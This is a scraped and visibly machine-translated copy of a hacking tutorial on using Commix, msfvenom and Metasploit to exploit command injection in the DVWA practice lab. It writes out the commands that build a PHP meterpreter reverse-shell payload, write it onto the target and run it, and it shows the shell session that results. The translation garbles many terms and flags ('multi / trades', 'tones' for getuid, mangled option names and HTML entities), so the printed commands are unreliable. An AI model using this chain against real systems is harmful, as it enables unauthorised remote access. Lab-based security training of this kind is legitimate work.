قالب وردپرس درنا توس
Home / Tips and Tricks / How to use Commix to automate exploitation of command injection deficiencies in web applications «Null Byte :: WonderHowTo

How to use Commix to automate exploitation of command injection deficiencies in web applications «Null Byte :: WonderHowTo



The ability to execute system commands via a vulnerable web application makes command injection a fertile attack vector for all hacker. But although this kind of vulnerability is highly appreciated, it may take some time to scan an entire application to find these shortcomings. Fortunately, there is a useful tool called Commix that can automate this process for us.

What is Commix?

Commix, which is a command-line injection utility port, is an open source utility that is used to test web applications for command-injection vulnerabilities and errors. It is automated, making it very easy to identify vulnerable parameters in a fraction of the time that would be required manually.

Commix is ​​written in Python, which means it can run on Linux, Mac and Windows. In addition, it is also conveniently included in the official archives Kali Linux, BlackArch and Parrot Security OS. Everything works right out of the box, and there is even support for custom module development to expand the core functionality of this tool.

There are lots of options available for use, including the ability to specify parameters used to connect to the host, target count, file access and modification, and even an offline mode. All of this feature makes Commix a very useful asset when trying to exploit the injection command.

In this tutorial, we use Commix and later msfvenom and Metasploit to exploit Command Injection Errors in DVWA.

Method 1: Basic Operation

To get started, open DVWA and log in with the default information.

Next, navigate to the "DVWA Security" tab and set the security level to "low." This will ensure that everything works smoothly when using this web application.

Now go to the "Command Execution" tab, which is our interesting site for Commix.

You need the cookie that contains session ID and security level for this tool to run successfully. Use the "Inspect Elements" tool in your browser to view the request, click "Network" and finally "Rawhead" to view the information.

Method 2: Download reverse Shell

Commix has a feature that allows us to write files on target systems. We will place a reverse shell on which will call back to our attacking machine, but before we do, we need to create a payload.

Msfvenom is a payload generator that replaces both msfpayload and msfencode back in 2015. This single tool can be used to generate payload when working outside the Metasploit Framework.

Use the command msfvenom using the following options.

  • -p
  • Use
  • lhost to set the listener's host address flag to enter the encoder.
  • The flag flag to specify output format.

Make sure to write > to write to the file payload.php .

  root @ drd: ~ # msfvenom -p php / meterpreter / reverse_tcp lhost = 172.16.1.100 lport = 4321 -e php / base64 -f raw> payload.php
[-] No platform was selected by selecting Msf :: Module :: Platform :: PHP from payload
[-] No arch selected, choose arch: php from the payload
Found 1 compatible encoder
Try to encode payload with 1 iterations of php / base64
php / base64 managed with size 1507 (iteration = 0)
php / base64 power with final size 1507
Load Length: 1507 bytes 

We see that the payload was created. Now we just need to add the PHP tags to our file. Enter nano payload.php and add <? Php at the beginning of the file and ?> at the end of the file. Press Ctrl-X Y and Enter to save.

Now we need to open a manager on our machine to capture the session that opens on the target. In a new terminal window, enter Metasploit by typing the command msfconsole . Then use use exploit / multi / trades to use the all-round merchant.

Then enter payload, listening address and port as we entered in our file earlier.

  msf utilize (multi / trades)> set payload php / meterpreter / reverse_tcp
payload => php / meterpreter / reverse_tcp
msf exploit (multi / trades)> set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit (multi / trades)> set lport 4321
lport => 4321 

Once set, start the manager by writing run an alias for exploitation.

  msf exploit (multi / trades)> run

[*] Started Reverse TCP Manager at 172.16.1.100:4321

Back in our second terminal, we can run Commix just like we did before with some extra options to get our payload on target.

  • – file-type the option to specify the file we want to use on our local machine.
  • The option – File Dest to set the target to the target.
  • ] The option – os-cmd indicates that the command should run when the file is written to the target.
  commix -h http://172.16.1.102/dvwa/vulnerabilities/exec/ - -cookie = & #;; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39; - file-write = & # 39; / root / payload.php & # 39; - file-dest = & # 39; / var / www / payload.php & # 39; os-cmd = & # 39; php -f /var/www/payload.php&#39;

This allows our payload to be performed and a session is captured by our manager if everything works properly. Commix will run a bit and eventually we can see that our file was successfully created on the target.

  ...

[*] Testing (Performance-Based) Classical Command Injection Techniques ... [ SUCCEED ]
[+]   The POST parameter "ip" appears injectable via (performance-based) classical command injection technology.
[~] Payment :; eko YJOSPV $ ((42 + 12)) $ (echo YJOSPV) YJOSPV
[+] The file /var/www/payload.php was successfully created! 

Now back in the second terminal, we can see that a Meter's session was really opened. We can now run commands like getuid and sysinfo to display information about the target.

  [*] Sending steps (37775 bytes) to 172.16.1.102
[*] Meter Session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500

meter> tones
Server username: www-data (33)
meter preter> sysinfo
Computer: Metaploitable
OS: Linux metasploitable 2.6.24-16 server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meters: php / linux 

These are similar results that we achieved earlier using Commix on our own, but now that we have a Metering session there is much more flexibility for what we can finally do.

Conclusion [19659003] Injection injection vulnerabilities are sought after by hackers because of their potential power over the target system. Commix is ​​an extremely useful tool designed to automate finding and utilizing these vulnerabilities, making life a little easier for the hacker.

In this guide, we learned some basic usage options. In addition, we saw how to combine msfvenom with Commix to load a payload to the target and get a shell. This flexibility makes Commix an excellent complement to any hacker's arsenal.

Do not miss: Use Metasploit's web browser script and command injection to pop a shell

Cover image of jarmoluk / Pixabay; Screenshots of drd_ / Null Byte

Source link